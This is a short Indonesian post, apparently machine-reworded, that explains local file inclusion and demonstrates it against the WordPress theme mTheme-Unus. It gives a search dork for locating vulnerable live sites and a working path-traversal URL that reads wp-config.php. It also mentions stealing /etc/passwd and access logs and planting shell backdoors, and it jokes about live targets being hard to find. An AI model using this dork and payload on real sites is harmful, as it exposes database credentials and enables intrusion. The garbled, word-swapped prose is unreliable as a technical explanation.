Local file inclusion (LFI) ialah sebuah kiat yang dipakai untuk menyimak file menggunakan faedah include/require terhadap file dalam localhost. Oleh karena tersebut disebut dengan local file inclusion. Berbeda dengan remote file inclusion (RFI) yang dapat menyimak file dari luar host. Untuk ulasan RFI next ya, sulit cari live targetnya :v
Dengan memanfaatkan faedah tersebut, LFI dapat digunakan untuk menyimak script server side laksana php. Yang seharusnya tidak dapat ditampilkan andai sebuah situs dimulai menggunakan web browser. Ini merupakan dampak dari sebuah file yang bisa memanggil file beda dengan path yang dapat dimodifikasi dan tanpa filtrasi.
LFI biasa dimanfaatkan untuk memungut informasi sensitif laksana konfigurasi database, etc/passwd dan access logs. Tetapi terkadang juga dapat digunakan untuk mengerjakan upload shell backdoor.
Disin saya akan memberikan contoh bagaiman LFI dilaksanakan terhadap tema wordpress mTheme-Unus. Jika penasaran kalian dapat mampir ke exploit-db.
Dork: inurl:/wp-content/themes/mTheme-Unus
Exploit: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php (Untuk memungut konfigurasi)
Selengkapnya baca di Local File Inclusion (LFI).